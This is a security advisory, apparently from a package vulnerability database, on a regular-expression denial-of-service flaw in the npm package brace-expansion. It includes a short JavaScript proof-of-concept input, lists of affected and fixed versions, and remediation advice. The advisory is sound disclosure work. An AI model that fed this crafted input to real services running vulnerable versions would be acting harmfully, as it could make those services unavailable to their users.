Nth Permutation Mathematics
brace-expansion

ReDoS

Severity: moderate

Overview

Affected versions of brace-expansion are vulnerable to a regular expression denial of service condition.

Proof of Concept

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Remediation

Update to version 1.1.7 or later.

Vulnerable versions

0.0.0
5 years ago
1.0.0
4 years ago
1.0.1
4 years ago
1.1.0
4 years ago
1.1.1
3 years ago
1.1.2
3 years ago
1.1.3
3 years ago
1.1.4
2 years ago
1.1.5
2 years ago
1.1.6
2 years ago

Unaffected versions

1.1.7
a year ago
1.1.8
a year ago
1.1.9
6 months ago
1.1.10
6 months ago
1.1.11
6 months ago

Advisory timeline

  1. Published

    Advisory published
    Apr 25th, 2017
  2. Reported

    Initial report by myvyang
    Apr 25th, 2017